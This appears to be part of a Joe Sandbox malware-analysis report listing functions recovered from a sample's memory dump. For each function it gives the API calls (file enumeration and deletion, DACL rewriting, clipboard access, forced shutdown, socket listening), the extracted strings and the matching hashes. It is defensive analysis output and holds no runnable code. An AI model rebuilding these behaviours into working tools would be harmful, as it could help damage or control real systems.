_memset.LIBCMT ref: 00DFEE52
GetMenuItemInfoW.USER32 ref: 00DFEE7D
GetMenuItemCount.USER32(00000000), ref: 00DFEE9D
GetMenuItemID.USER32(?,00000000), ref: 00DFEEB0
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00DFEEE4
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00DFEF2C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DFEF64
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00DFEF99

Strings

0, xrefs: 00DFEE4A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: 62df0cf7853f372cda2fa909214b5de8ee3f274151cad5827166015fbbc9bb4b
Instruction ID: c0f621f003beadd009a8b7ed7f02067303fd0a214bf1d5a8596f7c54c8a9f3c2
Opcode Fuzzy Hash: 62df0cf7853f372cda2fa909214b5de8ee3f274151cad5827166015fbbc9bb4b
Instruction Fuzzy Hash: F6818A71108309AFDB14CF15D884ABABBE5FF88354F05892DFA95972A1D730D905CBB2

Function 00DCB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DCB903
Part of subcall function 00DCB8E7: GetLastError.KERNEL32(?,00DCB3CB,?,?,?), ref: 00DCB90D
Part of subcall function 00DCB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00DCB3CB,?,?,?), ref: 00DCB91C
Part of subcall function 00DCB8E7: RtlAllocateHeap.NTDLL(00000000,?,00DCB3CB), ref: 00DCB923
Part of subcall function 00DCB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DCB93A

Part of subcall function 00DCB982: GetProcessHeap.KERNEL32(00000008,00DCB3E1,00000000,00000000,?,00DCB3E1,?), ref: 00DCB98E
Part of subcall function 00DCB982: RtlAllocateHeap.NTDLL(00000000,?,00DCB3E1), ref: 00DCB995
Part of subcall function 00DCB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00DCB3E1,?), ref: 00DCB9A6

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DCB3FC
_memset.LIBCMT ref: 00DCB411
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DCB430
GetLengthSid.ADVAPI32(?), ref: 00DCB441
GetAce.ADVAPI32(?,00000000,?), ref: 00DCB47E
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DCB49A
GetLengthSid.ADVAPI32(?), ref: 00DCB4B7
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00DCB4C6
RtlAllocateHeap.NTDLL(00000000), ref: 00DCB4CD
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DCB4EE
CopySid.ADVAPI32(00000000), ref: 00DCB4F5
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DCB526
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DCB54C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DCB560

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: b9c3c99eb674bd21c333b1aa67b3770d4d1ed3547981f4ba03df460a68601856
Instruction ID: 71b10436dfa6aebff2854a191bd5afd6fc65fb4ea3e1010c2729bd9e3fda9c18
Opcode Fuzzy Hash: b9c3c99eb674bd21c333b1aa67b3770d4d1ed3547981f4ba03df460a68601856
Instruction Fuzzy Hash: 8A51F87190020AAFDF14DFA5DC46EEEBB79FF08324F14811AE915A7291DB35DA09CB60

Function 00DD6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D931DA

Part of subcall function 00DD7C0C: GetFileAttributesW.KERNEL32(?,00DD6A7B), ref: 00DD7C0D

_wcscat.LIBCMT ref: 00DD6E7E
__wsplitpath.LIBCMT ref: 00DD6E99
FindFirstFileW.KERNEL32(?,?), ref: 00DD6EAE
_wcscpy.LIBCMT ref: 00DD6EDD
_wcscat.LIBCMT ref: 00DD6EEF
_wcscat.LIBCMT ref: 00DD6F01
DeleteFileW.KERNEL32(?), ref: 00DD6F0E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DD6F22
FindClose.KERNEL32(00000000), ref: 00DD6F3D

Strings

\*.*, xrefs: 00DD6E78

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 2e03c875558c954f0e485864a8ff3fb4c1ff9e0aab5c2cfb941eb3a83ee9ff72
Instruction ID: 720ffce3ada4e70fcc68ff694f5ac44e91e91d9a4df815a66ed1df6a3e4b0c62
Opcode Fuzzy Hash: 2e03c875558c954f0e485864a8ff3fb4c1ff9e0aab5c2cfb941eb3a83ee9ff72
Instruction Fuzzy Hash: 3221BF72409384AEC610EFA49C849DBBBEC9F99214F444E5BF5E5C3152EB34D60D8BB2

Function 00DE7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00DE72BB
EmptyClipboard.USER32 ref: 00DE72C1
GlobalAlloc.KERNEL32(00000002,?), ref: 00DE72D6
CloseClipboard.USER32 ref: 00DE7375

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: b85b53d92028e4d55e97d663803df55d7da659b6fb5812d3ffa242fc73807184
Instruction ID: a84aad03020b116ccfefb203a2bf7ffce1212c6a3498b5facb56e1dcf8c9d1d4
Opcode Fuzzy Hash: b85b53d92028e4d55e97d663803df55d7da659b6fb5812d3ffa242fc73807184
Instruction Fuzzy Hash: F621D331608210AFDB00AF66DC09BAD77A8FF04711F048015F95AAB261DB74ED009BB4

Function 00DE24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00DE24F6
Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DE2526
_wcscmp.LIBCMT ref: 00DE253A
_wcscmp.LIBCMT ref: 00DE2555
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DE25F3
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DE2609

Strings

*.*, xrefs: 00DE24D8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 8bf4983576861484f168e22e9c4b991e027698a24f0df9fb04785f7ee3d358f3
Instruction ID: e837521748d5eecab49099ffcc28a7c01cd1ebaf47a5f4307588199dfde3e790
Opcode Fuzzy Hash: 8bf4983576861484f168e22e9c4b991e027698a24f0df9fb04785f7ee3d358f3
Instruction Fuzzy Hash: 5641A07190425AAFCF11EFA5CD49AEEBBB8FF05310F24445AE815A2190E7309E44CFB0

Function 00D98CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON

Download Yara Rule

Strings

ERCP, xrefs: 00D98D68
VUUU, xrefs: 00D98FDD
VUUU, xrefs: 00E1C736
VUUU, xrefs: 00D98FCB
VUUU, xrefs: 00D9900A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 72cb26f8a329c041f6a1afc3ae3d5beca673344dccc10776cecd31f1f418d5b4
Instruction ID: ccf8ce1890fc4f38e8e1c5d4ed4b01cf51575cfeebf7ed44fc903f8a663a93df
Opcode Fuzzy Hash: 72cb26f8a329c041f6a1afc3ae3d5beca673344dccc10776cecd31f1f418d5b4
Instruction Fuzzy Hash: 43925C75E0021A8BDF24CF68C8907EDB7B1BB54314F2455AAE85AFB280D7709DC1DBA1

Function 00D98530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON

Download Yara Rule

APIs

Part of subcall function 00D9A2FB: _memmove.LIBCMT ref: 00D9A33D

_memmove.LIBCMT ref: 00D98672
_memmove.LIBCMT ref: 00D986C2
_memmove.LIBCMT ref: 00D98728

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 06ee512dd7c07e87009b4fb8e326423ed47a58df6e4386e82e3a10ba048cf5e3
Instruction ID: 0dc71a2388898140fabfcaa3d0a5b8d12620ca1180edf7a6c1f009e4d39348fd
Opcode Fuzzy Hash: 06ee512dd7c07e87009b4fb8e326423ed47a58df6e4386e82e3a10ba048cf5e3
Instruction Fuzzy Hash: F8126970A00609DFDF04DFA5D985AAEB7F5FF49300F208569E846E7290EB35AD51CB60

Function 00DFEAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

Part of subcall function 00DAB736: GetCursorPos.USER32(000000FF), ref: 00DAB749
Part of subcall function 00DAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00DAB766
Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000001), ref: 00DAB78B
Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000002), ref: 00DAB799

ReleaseCapture.USER32 ref: 00DFEB1A
SetWindowTextW.USER32(?,00000000), ref: 00DFEBC2
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DFEBD5
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00DFECAE

Strings

@GUI_DRAGFILE, xrefs: 00DFEC49
@GUI_DROPID, xrefs: 00DFEC05

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: 894db3605dcb66f8c98c5a9879435d6bbae6c4871c8580e04c7900cb4a521abb
Instruction ID: 16ff86d2c6e5e80667c53b32c48c1f94fd2df1941510e5561c957c08a42ebd82
Opcode Fuzzy Hash: 894db3605dcb66f8c98c5a9879435d6bbae6c4871c8580e04c7900cb4a521abb
Instruction Fuzzy Hash: 97519D70204304AFD718EF25CC56FAA7BE5FB88744F108A19F655A72E1D7709908CB72

Function 00DD82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DCBF0F
Part of subcall function 00DCBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DCBF3C
Part of subcall function 00DCBEC3: GetLastError.KERNEL32 ref: 00DCBF49

ExitWindowsEx.USER32(?,00000000), ref: 00DD830C

Strings

, xrefs: 00DD82FA
SeShutdownPrivilege, xrefs: 00DD82DA
@, xrefs: 00DD82FF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 346f8c750b51a3c532ed6e90a82359dd5e850cc0ae5a13c66f5cf9fc4c5f74b1
Instruction ID: d96700106867c284fd591796c42f66d5564b62f00b6ff1ba19bb7dd3b3071e48
Opcode Fuzzy Hash: 346f8c750b51a3c532ed6e90a82359dd5e850cc0ae5a13c66f5cf9fc4c5f74b1
Instruction Fuzzy Hash: 1401A271B44315ABE76A267C8C4BFBB765CEB05F80F180826F957E22D2DE60DC04A1B4

Function 00DE91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DE9235
WSAGetLastError.WS2_32(00000000), ref: 00DE9244
bind.WS2_32(00000000,?,00000010), ref: 00DE9260
listen.WS2_32(00000000,00000005), ref: 00DE926F
WSAGetLastError.WS2_32(00000000), ref: 00DE9289
closesocket.WS2_32(00000000), ref: 00DE929D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 5957a7d780d7525c22c1aacb4f0053fb53aaf687d220a370beb6f5af77e040f6
Instruction ID: 5b9be16c3e0de0cfabcd23ee7de324507f98ae5a56bb139bbe06e7f21d14abcf
Opcode Fuzzy Hash: 5957a7d780d7525c22c1aacb4f0053fb53aaf687d220a370beb6f5af77e040f6
Instruction Fuzzy Hash: 11219A35600600AFCF10EF69CC95BAEB7A9EF44324F14815AEA56AB3D1CB70AD45CB71

Function 00D96670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D967D0

Strings

hN, xrefs: 00E1216F
tM, xrefs: 00E12183

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: hN$tM
API String ID: 4104443479-658128583
Opcode ID: 0549ff62d35156970d9a99d0ea361f06b36e551688fef306dd8afb99fb8bdc91
Instruction ID: 8532846addcd6d9b1a5f78613e090b8b8915918032bc76f05c1d513d5f97ce78
Opcode Fuzzy Hash: 0549ff62d35156970d9a99d0ea361f06b36e551688fef306dd8afb99fb8bdc91
Instruction Fuzzy Hash: 7AA22875E01219DFCF28CF58C8806ADBBB1BF48314F2581AAD959AB390D774DE81DB60

Function 00D9A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON

Download Yara Rule

APIs

Part of subcall function 00DB010A: std::exception::exception.LIBCMT ref: 00DB013E
Part of subcall function 00DB010A: __CxxThrowException@8.LIBCMT ref: 00DB0153

_memmove.LIBCMT ref: 00E03020
_memmove.LIBCMT ref: 00E03135
_memmove.LIBCMT ref: 00E031DC

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 749f1bc462302cd70cede2c407a5976317ab11efce403136fbfc9846ce7ce7c1
Instruction ID: 1afd30ad913e7e9d7c8ab5089614ae081226c6896466a3d88065e7e61c8334f2
Opcode Fuzzy Hash: 749f1bc462302cd70cede2c407a5976317ab11efce403136fbfc9846ce7ce7c1
Instruction Fuzzy Hash: EA02B271A00205DFCF04DF68C981AAEBBF5EF49340F148469E806EB295EB31DA55CBB5

Function 00DE96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DEACD3: inet_addr.WS2_32(00000000), ref: 00DEACF5

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00DE973D
WSAGetLastError.WS2_32(00000000,00000000), ref: 00DE9760

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 7646f4fe137f763ac0f6fca9d20f6a1e9578bbfd5f8ddd5f9c51745ef65ade4a
Instruction ID: f21955adb5549d18ef504a33381a4aa5c78de1b6e290e5c595fa531086579fe3
Opcode Fuzzy Hash: 7646f4fe137f763ac0f6fca9d20f6a1e9578bbfd5f8ddd5f9c51745ef65ade4a
Instruction Fuzzy Hash: 8641C374A00200AFDB10AF69CC82E7EB7EDEF45724F148459F956AB392DB749D018BB1

Function 00DDF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00DDF37A
_wcscmp.LIBCMT ref: 00DDF3AA
_wcscmp.LIBCMT ref: 00DDF3BF
FindNextFileW.KERNEL32(00000000,?), ref: 00DDF3D0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00DDF3FE

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: cae384f0ffc658614bd9e004fdd388b888ae108d34d5b33f07017f348ff437c1
Instruction ID: 733e437f4ebcb994d4959c7da38d57e4398004619a5d52cc965f7d6713ce856c
Opcode Fuzzy Hash: cae384f0ffc658614bd9e004fdd388b888ae108d34d5b33f07017f348ff437c1
Instruction Fuzzy Hash: D3419E356047029FCB08DF28C890E9AB7E4FF49324F14456EE95ACB3A1DB31E945CBA1

